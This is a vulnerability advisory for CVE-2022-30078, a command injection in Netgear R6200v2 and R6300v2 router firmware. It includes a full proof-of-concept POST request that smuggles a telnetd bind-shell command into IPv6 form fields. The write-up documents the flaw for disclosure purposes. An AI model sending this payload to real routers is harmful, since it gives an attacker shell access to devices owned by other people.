CVE-2022-30078: vulnerabilities/CVE-2022-30078.md at main · 10TG/vulnerabilities

Command injection vulnerability in Netgear R6200_v2 and R6300v2 routers****Basic information

• CVE-ID：CVE-2022-30078
• Vendor: Netgear
• Product: R6200_v2 and R6300_v2
• Firmware version: All firmware version including the latest R6200v2-V1.0.3.12_10.1.11 and R6300v2-V1.0.4.52_10.0.93
• Firmware download link: https://www.downloads.netgear.com/files/GDC/R6200V2/R6200v2-V1.0.3.12_10.1.11.zip
  https://www.downloads.netgear.com/files/GDC/R6300V2/R6300v2-V1.0.4.52_10.0.93.zip
• Type: Insecure permissions - code execution

Vulnerability description

Vulnerability exists in the binary /sbin/acos_service in all R6200_v2 and R6300_v2 firmware versions including the latest R6200v2-V1.0.3.12 and R6300v2-V1.0.4.52. It might also infect some other products, which is recently not analyzed.
Taking the latest R6200_V2_1.0.3.12 firmware as an example, the four variables ipv6_wan_ipaddr, ipv6_lan_ipaddr, ipv6_wan_length, and ipv6_lan_length are passed into a function at offset 0x1B070.

Later, by analyzing the if statement, we can further confirm that these four variables can lead to command injection vulnerabilities. These parameters are passed into a sprintf function by the format string %s. Then, the value is passed to a system, which leads to a command injection vulnerability.

Through further attemps, we found that remote authenticated attackers can modify the value of the vulnerable parameters in website http://192.168.1.1/IPV6_fixed.htm by sending a modified request. As the vulnerable parameters are directly saved in nvram after sending the request, attackers can then execute arbitrary remote command as they controlled the parameter of a system call.
After visiting the web page and sending a POST request, if we set the ipv6_wan_ipaddr parameter of the request to be %24%28telnetd±l+%2Fbin%2Fsh±p+1235±b+0.0.0.0%29, we can actually execute command which $(telnetd -l /bin/sh -p 1235-b 0.0.0.0).
A potential PoC is shown below:

POST /ipv6_fix.cgi?id=2068267834 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1087
Origin: http://192.168.1.1
Authorization: Basic YWRtaW46YWRtaW4x
Connection: close
Referer: http://192.168.1.1/IPV6_fixed.htm
Cookie: XSRF_TOKEN=1222440606
Upgrade-Insecure-Requests: 1
apply=Apply&login_type=Fixed&IPv6WanAddr1=2001&IPv6WanAddr2=3CA2&IPv6WanAddr3=010F&IPv6WanAddr4=00A1&IPv6WanAddr5=121C&IPv6WanAddr6=0000&IPv6WanAddr7=0000&IPv6WanAddr8=0010&ProfixWanLength=6&IPv6Gateway1=2001&IPv6Gateway2=3CA2&IPv6Gateway3=010F&IPv6Gateway4=00A1&IPv6Gateway5=121C&IPv6Gateway6=0000&IPv6Gateway7=0000&IPv6Gateway8=0002&DAddr1=&DAddr2=&DAddr3=&DAddr4=&DAddr5=&DAddr6=&DAddr7=&DAddr8=&PDAddr1=&PDAddr2=&PDAddr3=&PDAddr4=&PDAddr5=&PDAddr6=&PDAddr7=&PDAddr8=&IpAssign=auto&IPv6LanAddr1=3113&IPv6LanAddr2=3CA2&IPv6LanAddr3=010F&IPv6LanAddr4=001A&IPv6LanAddr5=121B&IPv6LanAddr6=0000&IPv6LanAddr7=0000&IPv6LanAddr8=0001&ProfixLanLength=6&ipv6_wan_ipaddr=%24%28telnetd+-l+%2Fbin%2Fsh+-p+1235+-b+0.0.0.0%29&ipv6_lan_ipaddr=3113%3A3CA2%3A010F%3A001A%3A121B%3A0000%3A0000%3A0001&ipv6_wan_length=6&ipv6_lan_length=6&ipv6_pri_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_sec_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_wan_gateway=%24%28telnetd+-l+%2Fbin%2Fsh+-p+1234+-b+0.0.0.0%29&ipv6_enable_dhcp=&ipv6_proto=fixed

An evidence of the vulnerable is shown below:

Similarly, we can also change the other three parameters to construct similar commands, the evidence of the attacks using these parameters are shown as below:

Acknowledgment

This vulnerability credits to @maybethetricker and @river-li